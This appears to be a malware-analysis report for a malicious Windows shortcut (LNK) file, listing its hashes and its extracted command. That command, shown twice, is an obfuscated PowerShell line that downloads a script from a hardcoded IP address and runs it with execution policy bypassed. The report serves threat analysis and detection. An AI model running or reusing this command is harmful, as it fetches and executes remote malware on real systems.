General
Structural Analysis
Config.0
Yara Rules17
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
|
Hash | Hash Value |
|---|---|
| MD5 | c93d4615217d8ab0cd12260a3c89b0b5
|
| Sha1 | d8fce4fc8ece427cd122c935821d6652b00cda64
|
| Sha256 | 7965d0273aef7893e1a36a24a4fadbcea99979f43911847bd6b421f8ac24cbb4
|
| Sha384 | ea959653ab9647b4a22e4a199b9fc4db146253cbc3235f83e25b001b49b277d569dd5122b4f226204607df8f6c12101b
|
| Sha512 | 2198d44668d0a6d785f2f11f91983d7e0ce64436f59a85f18fe4c95ce25be20786a9a3999c314410354fb8abcef6ba561763a3ac9f70ba78ae592e10b18e0e3c
|
| SSDeep | 12:8d/Zs0oirVUzD4Sio6+s8Xxeni/XSON+1gqlYvaYkKfgr4PaOkQr+rnOWaZZ:8d/7rtf+Gi/fqgqlCR+AGOr
|
| TLSH | 77E38E9277F90F04E7B39B3EB97BA26094BE35C4DE31879D030098295935950C4A5F2F
|
File Structure
c93d4615217d8ab0cd12260a3c89b0b5
Malicious
Artefacts
|
Name0 | Value |
|---|---|
| LNK: Command Execution | powershell.exe -win 1 echo 1; &(Get-Command i**-we**********) -uri ht''tp://5.8''.19.43/kas/moat.ps1 -OutFile moat.ps1; powershell.exe -noprofile -executionpolicy bypass -file "$env:localappdata\moat.ps1" |
c93d4615217d8ab0cd12260a3c89b0b5 (155.96 KB)
File Structure
c93d4615217d8ab0cd12260a3c89b0b5
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe -win 1 echo 1; &(Get-Command i**-we**********) -uri ht''tp://5.8''.19.43/kas/moat.ps1 -OutFile moat.ps1; powershell.exe -noprofile -executionpolicy bypass -file "$env:localappdata\moat.ps1" Malicious |
c93d4615217d8ab0cd12260a3c89b0b5 |
You must be signed in to post a comment.
You need a premium account to access this feature.
You must be signed in to post a comment.